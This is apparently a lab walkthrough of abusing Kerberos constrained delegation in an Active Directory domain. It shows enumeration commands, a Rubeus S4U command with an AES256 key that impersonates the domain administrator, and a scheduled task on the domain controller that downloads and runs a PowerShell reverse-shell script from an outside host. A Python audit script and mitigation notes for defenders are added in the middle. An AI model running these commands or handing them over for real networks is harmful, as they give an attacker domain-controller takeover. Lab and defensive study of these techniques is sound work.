Now let’s enumerate the users and computers that have constrained delegation configured

Get-DomainUser -TrustedToAuth

If we compromise the user websvc, we can impersonate the Domain Admin to the CIFS service on the dcorp-mssql computer

Get-DomainComputer -TrustedToAuth

Now this looks interesting: if we compromise the dcorp-adminsrv computer, we can impersonate the Domain Administrator to the Time service on the Domain Controller

Now let’s abuse the Constrained Delegation

.\Rubeus.exe s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:administrator /msdsspn:TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:HOST /nowrap /ptt
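As a defender-side audit of what the enumeration above reveals, here is an added Python example (not from the original notes): it scores each constrained-delegation entry by the host it can reach rather than by SPN, because the service class in the requested ticket is not protected (which is what the /altservice:HOST swap above relies on), so delegation to TIME on a DC is effectively delegation to every service on that DC. The entries, the DC list and the field names are constructed to mirror the lab; in practice they come from the msDS-AllowedToDelegateTo and userAccountControl attributes.

```python
# Added example (not part of the original notes): rank constrained-delegation
# entries by the host they reach. Inputs are constructed to mirror the lab;
# in practice export msDS-AllowedToDelegateTo and userAccountControl from AD.

TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # userAccountControl bit: protocol transition

# Constructed sample entries (name, userAccountControl, msDS-AllowedToDelegateTo).
SAMPLE_ENTRIES = [
    {"name": "websvc", "uac": TRUSTED_TO_AUTH_FOR_DELEGATION | 0x200,
     "allowed": ["CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL", "CIFS/dcorp-mssql"]},
    {"name": "dcorp-adminsrv$", "uac": TRUSTED_TO_AUTH_FOR_DELEGATION | 0x1000,
     "allowed": ["TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL", "TIME/dcorp-dc"]},
    {"name": "appsvc", "uac": 0x200,  # Kerberos-only delegation, no protocol transition
     "allowed": ["HTTP/dcorp-web.dollarcorp.moneycorp.LOCAL"]},
]

# Constructed: in practice take this from the Domain Controllers OU.
DOMAIN_CONTROLLERS = {"dcorp-dc"}


def host_of(spn):
    """Short host name of 'class/host[:port]'. The class is deliberately ignored:
    the sname in a service ticket is unencrypted, so a ticket for TIME/host
    is usable as HOST/host or CIFS/host (what /altservice exploits)."""
    rest = spn.split("/", 1)[1] if "/" in spn else spn
    return rest.split(":")[0].split(".")[0].lower()


def audit(entries, dcs=DOMAIN_CONTROLLERS):
    """Return one finding per entry with a severity a defender can triage on."""
    findings = []
    for e in entries:
        hosts = sorted({host_of(s) for s in e["allowed"]})
        protocol_transition = bool(e["uac"] & TRUSTED_TO_AUTH_FOR_DELEGATION)
        hits_dc = any(h in dcs for h in hosts)
        if hits_dc and protocol_transition:
            severity = "critical"  # account credentials alone yield a DC ticket as any user
        elif hits_dc or protocol_transition:
            severity = "high"      # DC reach (needs a real user logon first) or free impersonation
        else:
            severity = "medium"
        findings.append({"account": e["name"], "hosts": hosts,
                         "protocol_transition": protocol_transition,
                         "delegates_to_dc": hits_dc, "severity": severity})
    return sorted(findings, key=lambda f: ["critical", "high", "medium"].index(f["severity"]))


if __name__ == "__main__":
    for f in audit(SAMPLE_ENTRIES):
        print(f["severity"], f["account"], "->", ", ".join(f["hosts"]), "pt=" + str(f["protocol_transition"]))
```

Accounts that must never be impersonated this way (the Domain Admin here) belong in Protected Users or get "Account is sensitive and cannot be delegated", which makes the S4U2Proxy step fail for them.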

Now let’s list the tickets in the current logon session

klist

Now let’s create a scheduled task on the Domain Controller to get a reverse shell

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''http://172.16.100.22/Invoke-PowerShellTcp.ps1''')'"

Now let’s run the task

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"